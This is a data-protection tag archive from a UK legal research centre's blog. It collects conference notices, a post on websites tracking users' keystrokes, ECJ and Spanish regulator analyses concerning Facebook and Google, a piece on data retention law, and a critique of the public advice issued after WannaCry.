Tag Archives: data protection

Annual Conference 2017 Resources

The Information Law and Policy Centre held its third annual conference on 17th November 2017. The workshop’s theme was: ‘Children and Digital Rights: Regulating Freedoms and Safeguards’.

The workshop brought together regulators, practitioners, civil society, and leading academic experts who addressed and examined the key legal frameworks and policies being used and developed to safeguard children’s digital freedoms and rights. These legislative and policy regimes include the UN Convention on the Rights of the Child, and the related provisions (such as consent, transparency, and profiling) under the UK Digital Charter, and the Data Protection Bill which will implement the EU General Data Protection Regulation.

The following resources are available online:

  • Full programme
  • Presentation: ILPC Annual Conference, Baroness Beeban Kidron (video)
  • Presentation: ILPC Annual Conference, Anna Morgan (video)
  • Presentation: ILPC Annual Conference, Lisa Atkinson (video)
  • Presentation: ILPC Annual Conference, Rachael Bishop (video)

How websites watch your every move and ignore privacy settings

File 20171122 6055 jrvkjw.jpg?ixlib=rb 1.1

In this guest post, Yijun Yu, Senior Lecturer, Department of Computing and Communications, The Open University examines the world’s top websites and their routine tracking of a user’s every keystroke, mouse movement and input into a web form – even if it’s later deleted.

Hundreds of the world’s top websites routinely track a user’s every keystroke, mouse movement and input into a web form – even before it’s submitted or later abandoned, according to the results of a study from researchers at Princeton University.

And there’s a nasty side-effect: personal identifiable data, such as medical information, passwords and credit card details, could be revealed when users surf the web – without them knowing that companies are monitoring their browsing behaviour. It’s a situation that should alarm anyone who cares about their privacy.

The Princeton researchers found it was difficult to redact personally identifiable information from browsing behaviour records – even, in some instances, when users have switched on privacy settings such as Do Not Track.

Continue reading

Who’s responsible for what happens on Facebook? Analysis of a new ECJ opinion

In this guest post Lorna Woods, Professor of Internet Law at the University of Essex, provides an analysis on the new ECJ opinion . This post first appeared on the blog of Steve Peers, Professor of EU, Human Rights and World Trade Law at the University of Essex.

Who is responsible for data protection law compliance on Facebook fan sites? That issue is analysed in a recent opinion of an ECJ Advocate-General, in the case of Wirtschaftsakademie (full title: Unabhängiges Landeszentrum für Datenschutz Schleswig-Holstein v Wirtschaftsakademie Schleswig-Holstein GmbH, in the presence of Facebook Ireland Ltd, Vertreter des Bundesinteresses beim Bundesverwaltungsgericht).

This case is one more in a line of cases dealing specifically with the jurisdiction of national data protection supervisory authorities, a line of reasoning which seems to operate separately from the Brussels I Recast Regulation, which concerns jurisdiction of courts over civil and commercial disputes.  While this is an Advocate-General’s opinion, and therefore not binding on the Court, if followed by the Court it would consolidates the Court’s prior broad interpretation of the Data Protection Directive.  While this might be the headline, it is worth considering a perhaps overlooked element of the data-economy: the role of the content provider in providing individuals whose data is harvested.

Continue reading

The Surveillance Triangle: Authorities, Data subjects and Means

Readers of the Information and Law Policy Centre blog may be interested in the following event held by Maastricht University.

The academic conference addresses the question as to how surveillance is perceived from the perspective of three main stakeholders involved in the process of surveillance: surveillance authorities, data subjects and companies. The conference tackles precisely this issue. It brings together the perspective of those stakeholders and provides informative insights of academics from both the EU and the US on how these issues interplay in different contexts.

Programme

9:30-10:00 Registration
10:00-10:30 Keynote speech:
The EU’s approach towards surveillance”, Philippe Renaudière, Data Protection Officer, European Commission
10:30-12:00 Panel I: The perspective of the authorities who exercise surveillance
12:00-13:30 Lunch
13:30-15:00 Panel II: The perspective of Individuals subject to surveillance
15:00-15:30 Coffee break
15:30-17:00 Panel III: Means of Surveillance
17:00-17:30 Closing remarks, Giovanni Buttarelli, EDPS
17:30-18:00 Wrap-up
18:00 Network Cocktail

Submissions to the Law Commission’s consultation on ‘Official Data Protection’: CFOI and Article 19

The Law Commission has invited interested parties to write submissions commenting on the proposals outlined in a consultation report on ‘official data protection’. The consultation period closed for submissions on 3 May, although some organisations have been given an extended deadline. (For more detailed background on the Law Commission’s work please see the first post in this series). 

The Information Law and Policy Centre is re-publishing some of the submissions written by stakeholders and interested parties in response to the Law Commission’s consultation report (pdf) to our blog. In due course, we will collate the submissions on a single resource page. If you have written a submission for the consultation you would like (re)-published please contact us

Please note that none of the published submissions reflect the views of the Information Law and Policy Centre which aims to promote and facilitate cross-disciplinary law and policy research, in collaboration with a variety of national and international institutions.

The second in our series is the joint response submitted by the Campaign for Freedom of Information and Article 19. The response was accompanied by a press release. (The first in this series was the Open Rights Group submission.)

Download (PDF, 417KB)

Call for Papers – Children and Digital Rights: Regulating Freedoms and Safeguards

We are pleased to announce this call for papers for the Information Law and Policy Centre’s Annual Conference on 17 November 2017 at IALS in London, this year supported by Bloomsbury’s Communications Law journal. You can read about our previous annual events here.

We are looking for high quality and focused contributions that consider information law and policy within the context of children and digital rights. Whether based on doctrinal analysis, or empirical social research, papers should offer an original perspective on the implications posed by the data-driven society for the regulation of the digital rights of children and young adults, and the freedoms and safeguards therein.

Topics of particular interest in 2017 include:

  • Internet intermediary liability
  • Social media
  • Data privacy
  • Internet of Things
  • Cyber security
  • UN Convention on the Rights of the Child
  • Online games/apps
  • Digital education
  • The EU General Data Protection Regulation

The workshop will take place on Friday 17th November 2017 and will be followed by the Information Law and Policy Centre’s Annual Lecture and an evening reception.

Attendance will be free of charge thanks to the support of the IALS and our sponsor, although registration is required as places are limited.

The best papers will be featured in a special issue of Bloomsbury’s Communications Law journal, following a peer-review process. Those giving papers will be invited to submit full draft papers to the journal by 1st November 2017 for consideration by the journal’s editorial team.

How to apply:

Please send an abstract of between 250-300 words and some brief biographical information to Eliza Boudier, Fellowships and Administrative Officer, IALS: eliza.boudier@sas.ac.uk by Friday 14th July 2017 (5pm, BST).

Abstracts will be considered by the Information Law and Policy Centre’s academic staff and advisors, and the Communications Law journal editorial team.

About the Information Law and Policy Centre at the IALS:

The Information Law and Policy Centre (ILPC) produces, promotes, and facilitates research about the law and policy of information and data, and the ways in which law both restricts and enables the sharing, and dissemination, of different types of information.

The ILPC is part of the Institute of Advanced Legal Studies (IALS), which was founded in 1947. It was conceived, and is funded, as a national academic institution, attached to the University of London, serving all universities through its national legal research library. Its function is to promote, facilitate, and disseminate the results of advanced study and research in the discipline of law, for the benefit of persons and institutions in the UK and abroad.

The ILPC’s Annual Conference and Annual Lecture form part of a series of events celebrating the 70th Anniversary of the IALS in November.

About Communications Law (Journal of Computer, Media and Telecommunications Law):

Communications Law is a well-respected quarterly journal published by Bloomsbury Professional covering the broad spectrum of legal issues arising in the telecoms, IT, and media industries. Each issue brings you a wide range of opinion, discussion, and analysis from the field of communications law. Dr Paul Wragg, Associate Professor of Law at the University of Leeds, is the journal’s Editor in Chief.

Observing the WannaCry fallout: confusing advice and playing the blame game

In this guest post, researchers from the Information Security Group at UCL – Steven J. Murdoch, Angela Sasse, Wendy M. Grossman and Simon Parkin – consider what lessons should be learnt after the WannaCry ransomware attack.

As researchers who strive to develop effective measures that help individuals and organisations to stay secure, we have observed the public communications that followed the WannaCry ransomware attack of May 2017 with increasing concern. As in previous incidents, many descriptions of the attack are inaccurate – something colleagues have pointed out elsewhere. Our concern here is the advice being disseminated, and the fact that various stakeholders seem to be more concerned with blaming each other than with working together to prevent further attacks affecting organisations and individuals.

Countries initially affected in WannaCry ransomware attack (source Wikipedia, User:Roke)

Let’s start with the advice that is being handed out. Much of it is unhelpful at best, and downright wrong at worst – a repeat of what happened after Heartbleed, when people were advised to change their passwords before the affected organisations had patched their SSL code. Here is a sample of real advice sent out to staff in major organisation post-WannaCry:

“We urge you to be vigilant and not to open emails that are unexpected, unusual or suspicious in any way. If you experience any unusual computer behaviour, especially any warning messages, please contact your IT support immediately and do not use your computer further until advised to do so.”

Useful advice has to be correct and actionable. Users have to cope with dozens, maybe hundreds, of unexpected emails every day, most containing links and many accompanied by attachments, cannot take ten minutes to ponder each email before deciding whether to respond. Such instructions also implicitly and unfairly suggest that users’ ordinary behaviour plays a major role in causing major incidents like this one. RISCS advocates enlisting users as part of frontline defence. Well-targeted, automated blocking of malicious emails lessen the burden on individual users, and build resilience for the organisation in general.

In an example of how to confuse users, The Register reports that City of London Police sent out its “advice” via email in an attachment entitled “ransomware.pdf”. So users are simultaneously exhorted to be “vigilant” and not open emails and required to open an email in order to get that advice. The confusion resulting from contradictory advice is worse than the direct consequences of the attack: it enables future attacks. Why play Keystone Cyber Cops when UK National Technical Authority for such matters, the National Centre for Cyber Security, offers authoritative and well-presented advice on their website?

Our other concern is the unedifying squabbling between spokespeople for governments and suppliers blaming each other for running unsupported software, not paying for support, charging to support unsupported software, and so on, with and security experts weighing in on all sides. To a general public already alarmed by media headlines, finger-pointing creates little confidence that either party is competent or motivated to keep secure the technology on which our lives all now depend. When the supposed “good guys” expend their energy fighting each other, instead of working together to defeat the attackers, it’s hard to avoid the conclusion that we are most definitely doomed. As Columbia University professor Steve Bellovin writes, the question of who should pay to support old software requires broader collaborative thought; in avoiding that debate we are choosing to pay as a society for such security failures.

We would refer those looking for specific advice on dealing with ransomware to the NCSC guidance, which is offered in separate parts for SMEs and home users and enterprise administrators.

Much of NCSC’s advice is made up of things we all know: we should back up our data, patch our systems, and run anti-virus software. Part of RISCS’ remit is to understand why users often don’t follow this advice. Ensuring backups remain uninfected is, unfortunately, trickier than it should be. Ransomware will infect – that is, encrypt – not only the machine it’s installed on but any permanently-connected physical or network drive. This problem ought to be solved by cloud storage, but it can be difficult to find out whether cloud backups will be affected by ransomware, and technical support documentation often simply refers individuals to “your IT support”, even though vendors know few individuals have any. Dropbox is unusually helpful, and provides advice on how to recover from a ransomware attack and how far it can help. Users should be encouraged to read such advice in advance and factor it into backup plans.

There are many reasons why people do not update their software. They may, for example, have had bad experiences in the past that lead them to worry that security updates will fail or leave their system damaged, or incorporate unwanted changes in functionality. Software vendors can help here by rigorously testing updates and resisting the temptation to bundle in new features. IT support staff can help by doing their own tests that allow them to reassure their users that they will help resolve any resulting problems in a timely manner.

In some cases, there are no updates to install. The WannaCry ransomware attack highlighted the continuing use of desktop Windows XP, which Microsoft stopped supporting with security updates in 2014. A few organisations still pay for special support contracts, and Microsoft made an exception for WannaCry by releasing a security patch more widely. Organisations that still have XP-based systems should now investigate to understand why equipment using an unsafe, outdated operating system is still in use. Ideally, the software should be replaced with a more modern system; if that’s not possible the machine should be isolated from network connections. No amount of reminding users to patch their systems or telling them to “be vigilant” will be effective in such cases.

This article also appears on Bentham’s Gaze, the blog of the UCL Information Security Group.

Where to after Watson? The challenges and future of mass data retention in the UK

CJEUAs our lives have increasingly become data-driven and digital by default, finding the balance between privacy and national security/law enforcement has become one of the central legal, political, and ethical debates of the information age. On 11 May, the Director of the Information Law and Policy Centre, Dr Nora Ni Loideain joined a panel of experts at a Bingham Centre event to discuss the latest round in the legal debate – the European Court of Justice’s (CJEU) recent ruling in a case brought by Tom Watson MP against the UK government in regard to the legality of the Data Retention and Investigatory Powers Act (DRIPA). Although DRIPA has now expired, the CJEU Grand Chamber judgment delivered last December also calls into question the legal status of the legislation which replaced DRIPA in 2016, the Investigatory Powers Act (IP Act).

According to the panel chair, Professor Lorna Woods, the CJEU judgment formed what might be considered a “strong view” on privacy and regarded mass data retention as “disproportionate” compared to citizens’ rights to privacy. In this regard, the ruling continued in the same vein as the landmark 2014 Digital Rights Ireland judgment, which struck down the EU’s instrument for mandatory mass data retention – the Data Retention Directive – and declared it to be incompatible with the right to respect for private life and data protection protected by Articles 7 and 8 of the EU Charter of Fundamental Rights.

As we wait for the UK Court of Appeal to interpret the Watson/Tele2 judgment in relation to UK law, the panel considered what the Grand Chamber’s judgment might mean for mass data retention. In particular, Professor Lorna Woods put it to the panel and audience to consider whether the scope of data retention currently provided for under the IP Act 2016 was still possible in light of the reasoning of the CJEU Grand Chamber’s judgment. Continue reading

Information Law Group 2nd Annual ‘Work in Progress’ Workshop

The Information Law Group at the University of Sussex warmly invites you to their 2nd Annual ‘Work in Progress’ Workshop on Wednesday 3rd May.

The workshop provides an opportunity to discuss current research and receive feedback in a highly focused, informal environment.

The event is preceded by a PhD workshop (11-1pm) and followed by a lecture by Rob Wainwright, Director of Europol (5.30-6.30pm), entitled “The Role of Europol in Countering Organised Crime and Terrorism”.

Book Now

AGENDA

2.00pm – 3.30pm “Challenges to Competition Law in Information Markets”

Chair: Dr Judith Townend (Sussex); Discussant: Prof Chris Marsden (Sussex)

  • Dr Konstantinos Stylianou (Leeds) “Redefining Normal Competition: The Case Study of the ICT Industry”
  • Dr Konstantina Bania (EBU, TILEC) “The role of consumer data in the enforcement of competition laws”
  • Dr Nico Zingales (Sussex) “The rise of ‘infomediaries’ and its implications for antitrust enforcement”

3.30pm – 4.00pm Coffee Break

4.00pm – 5.30pm “Intermediary Platform Responsibility”

Chair: Prof Chris Marsden (Sussex); Discussant: Orla Lynskey (LSE)

  • Dr Andres Guadamuz (Sussex), “Whatever happened to our dream of an empowering Internet (and how to get it back)”
  • Dr David Erdos (Cambridge), “Intermediary Publisher Responsibility for Third Party Rights in European Data Protection”
  • Dr Felipe Romero Moreno (Hertfordshire), “The fake-news phenomenon in the 2016 post-crisis digital era”

5.30pm – 6.30pm Lecture: Rob Wainwright, Director of Europol “The Role of Europol in Countering Organised Crime and Terrorism”.

Communicating Responsibilities: The Spanish DPA targets Google’s Notification Practices when Delisting Personal Information

In this guest post, David Erdos, University Lecturer in Law and the Open Society, University of Cambridge, considers the 2016 Resolution made by the Spanish Data Protection Authority in relation to Google’s approach to de-listing personal information. 

Spanish Data protection authorityThe Court of Justice’s seminal decision in Google Spain (2014) represented more the beginning rather than the endpoint of specifying the European data protection obligations of search engines when indexing material from the web and, as importantly, ensuring adherence to this.

In light of its over 90% market share of search, this issue largely concerns Google (even Bing and Yahoo come in a very distant second and third place).  To its credit, Google signalled an early willingness to comply with Google Spain.  At the same time, however, it construed this narrowly.  Google argued that it only had to remove specified URL links following ex post demands from individual European citizens and/or residents (exercising the right to erasure (A. 12c) and or objection (A. 14)), only as regards searches made under their name, only on European-badged search searches (e.g. .uk, .es) and even if the processing violated European data protection standards not if the processing was judged to be in the ʻpublic interestʼ.

It also indicated that it would inform the Webmasters of the ʻoriginalʼ content when de-listing took place (although it signalled that it would stop short of its usual practice of providing a similar notification to individual users of its services, opting instead for a generic notice only).

In the subsequent two and a half years, Google’s approach has remained in broad terms relatively stable (although from early 2015 it did stop notifying Webmasters when de-listing material from malicious porn sites (p. 29) and from early 2016 it has deployed (albeit imperfect) geolocation technology to block the return of de-listing results when using any of version of the Google search engine (e.g. .com) from the European country from where the demand was lodged).

Many (although not all) of these limitations are potentially suspect under European data protection, and indeed private litigants have (successfully and unsuccessfully) already brought a number of challenges.  No doubt partly reflecting their very limited resources, European Data Protection Authorities (DPAs) have adopted a selective approach, targeting only those issues which they see as the most critical.  Indeed, the Article 29 Working Party November 2014 Guidelines focussed principally on two concerns:

  • Firstly, that the geographical scope of de-listing was too narrow. To ensure “effective and complete protection” of individual data subjects, it was necessary that de-listing be “effective on all relevant domains, including .com”.
  • Secondly, that communication to third parties of data concerning de-listing identifiable to particular data subjects should be both very limited and subject to strong discipline. Routine communication “to original webmasters that results relating to their content had been delisted” was simply unlawful and, whilst in “particularly difficult cases” it might in principle be legitimate to contact such publishers prior to making a de-listing decision, even here search engines must then “take all necessary measures to properly safeguard the rights of the affected data subject”.

Since the release of the Guidelines, the French DPA has famously (or infamously depending on your perspective!) adopted a strict interpretation of the first concern requiring de-listing on a completely global scale and fining Google €100K for failing to do this.  This action has now been appealed before the French Conseil d’État and much attention has been given to this including by Google itself.  In contrast, much less publicity has been given to the issue of third party communication.

Nevertheless, in September 2016 the Spanish DPA issued a Resolution fining Google €150K for disclosing information identifiable to three data subjects to Webmasters and ordered it to adopt measures to prevent such practices reoccurring.  An internal administrative appeal lodged by Google against this has now been rejected and a challenge in court now seems inevitable.  This piece explores the background to, nature of and justification for this important regulatory development.

The Determinations Made in the Spanish Resolution

Apart from the fact that they had formally complained, there was nothing unusual in the three individual cases analysed in the Spanish Resolution.  Google had simply followed its usual practice of informing Webmasters that under data protection law specified URLs had been deindexed against a particular (albeit not directly specified) individual name.  Google sought to defend this practice on four separate grounds:

  • Firstly, it argued that the information provided to Webmasters did not constitute personal data at all. In contrast, the Spanish regulator argued that in those cases where the URL led to a webpage in which only one natural person was mentioned then directly identifiable data had been reported, whilst even in those cases where several people were mentioned the information was still indirectly identifiable since a simple procedure (e.g. conducting a search on names linked to the webpage in question) would render the information fully identified.  (Google’s argument here in any case seemed to be in tension with its practice since September 2015 of inviting contacted Webmasters to notify Google of any reason why the de-listing decision should be reconsidered – this would only really make sense if the Webmaster could in fact deduce what specific de-listing had in fact taken place).
  • Second, it argued that, since its de-listing form stated that it “may provide details to webmaster(s) of the URLs that have been removed from our search results”, any dissemination had taken place with the individual’s consent. Drawing especially on European data protection’s requirement that consent be “freely given” (A. 2 (h)) this was also roundly rejected.  In using the form to exercise their legal rights, individuals were simply made to accept as a fait accompli that such dissemination might take place.
  • Third, it argued that dissemination was nevertheless a compatible” (A. 6 (1) (b)) processing of the data given the initial purpose of its collection, finding a legal basis as necessary” for the legitimate interests (A. 7 (f)) of Webmasters regarding this processing (e.g. to contact Google for a reconsideration). The Spanish DPA doubted that Webmasters could have any legitimate interest here since “search engines do not recognize a legal right of publishers to have their contents indexed and displayed, or displayed in a particular order”, the Court of Justice had only referenced that the interests of the search engine itself and Internet users who might receive the information were engaged and, furthermore, had been explicit that de-listing rights applied irrespective of whether the information was erased at source or even if publication there remained lawful.  In any case, it emphasized that any such interest had (as article 7 (f) explicitly states) to be balanced with the rights and freedoms of data subjects which the Court had emphasized must be “effective and complete” in this context.  In contrast, Google’s practice of essentially unsafeguarded disclosure of the data to Webmasters could result in the effective extinguishment of the data subject’s rights since Webmasters had variously republished the deindexed page against another URL, published lists of all URLs deindexed or even published a specific news story on the de-listing decision.
  • Fourth, Google argued that its practice was an instantiation of the data subject’s right to obtain from a controller “notification to third parties to whom the data have been disclosed of any rectification, erasure or blocking” carried out in compliance with the right to erasure “unless this provides impossible or involves a disproportionate effort” (A. 12 (c)). The Spanish regulator pointed out that since the data in question had originally been received from rather than disclosed to Webmasters, this provision was not even materially engaged.  In any case, Google’s interpretation of it was in conflict with its purpose which was to ensure the full effectiveness of the data subject’s right to erasure.

Having established an infringement of the law, the Spanish regulator had to consider whether to pursue this as an illegal communication of data (judged ʻvery seriousʼ under Spanish data law) or only as a breach of secrecy (which is judged merely as ʻseriousʼ).  In the event, it plumped for the latter and issued a fine of €150K which was in the mid-range of that set out for ʻseriousʼ infringements.  As previously noted, it also injuncted Google to adopt measures to prevent re-occurrence of these legal failings and required that these be communicated to the Spanish DPA.

Analysis

This Spanish DPA’s action tackles a systematic practice which has every potential to fundamentally undermine practical enjoyment of rights to de-listing and is therefore at least as significant as the ongoing regulatory developments in France which relate to the geographical scope of these rights.  It was entirely right to find that personal data had been disseminated, that this had been done without consent, that the processing had nothing to do with the right (which, in any case, is not an obligation) of data subjects to have third parties notified in certain circumstances and that this processing was “incompatible” with the initial purpose of data collection which was to ensure data subject’s legal rights to de-listing.

It is true that the Resolution was too quick to dismiss the idea that original Webmasters do have “legitimate interests” in guarding against unfair de-listings of content.  Even in the absence of a de jure right to such listings, these interests are grounded in their fundamental right to “impart” information (and ideas), an aspect of freedom of expression (ECHR, art. 10; EU Charter, art. 11).   In principle, these rights and interests justify search engines making contact with original Webmasters, at the least as the Working Party itself indicated in particularly difficult de-listing cases.

However, even here dissemination must (as the Working Party also emphasized) properly safeguard the rights and interest of data subjects.  At the least this should mean that, prior to any dissemination, a search engine should conclude a binding and effectively policeable legal contract prohibiting Webmasters from disseminating the data in identifiable form.  (In the absence of this, those Webmasters out of European jurisdiction or engaged in special/journalistic expression cannot necessarily be themselves criticized for making use of the information received in other ways).

In stark contrast to this, Google currently engages in blanket and essentially unsafeguarded reporting to Webmasters, a practice which has resulted in a breakdown of effective protection for data subjects not just in Spain but also in other European jurisdictions such as the UK – see here and here.  Having been put on such clear notice by this Spanish action, it is to be hoped the Google will seriously modify its practices.  If not, then regulators would have every right to deal with this in the future as a (yet more serious) illegal and intentional communication of personal data.

Future Spanish Regulatory Vistas

The cases investigated by the Spanish DPA noted in this Resolution also involved the potential dissemination of data to the Lumen transparency database (formally Chilling Effects) which is hosted in the United States, the potential for subsequent publication of identifiable data on its publicly accessible database and even the potential for a specific notification to be provided to Google users conducting relevant name searches detailing that “[i]n response to a legal requirement sent to Google, we have removed [X] result(s) from this page.  If you wish, you can get more information about this requirement on LumenDatabase.org.

This particular investigation, however, failed to uncover enough information on these important matters.  Google was adamant that it had not yet begun providing information to Lumen in relation to data protection claims post-Google Spain, but stated that it was likely to do so in the future in some form.  Meanwhile, it indicated that the specific Lumen notifications which were found on name searches regarding two of the claimants concerned pre-Google Spain claims variously made under defamation, civil privacy law and also data protection.  (Even putting to one side the data protection claim, such practices would still amount to a processing of personal data and also highlight the often marginal and sometimes arbitrary distinctions between these very related legal causes of action).

Given these complications, the Spanish regulator decided not to proceed directly regarding these matters but rather open more wide-ranging investigatory proceedings concerning both Google’s practices in relation to disclosure to Lumen and also notification provided to search users.  Both sets of investigatory proceedings are ongoing.  Such continuing work highlights the vital need for active regulatory engagement to ensure that the individual rights of data subjects are effectively secured.  Only in this way will basic European data protection norms continue to ʻcatch upʼ not just with Google but with developments online generally.

David Erdos, University Lecturer in Law and the Open Society, Faculty of Law & WYNG Fellow in Law, Trinity Hall, University of Cambridge.

(I am grateful to Cristina Pauner Chulvi and Jef Ausloos for their thoughts on a draft of this piece.)

This post first appeared on the Inforrm blog.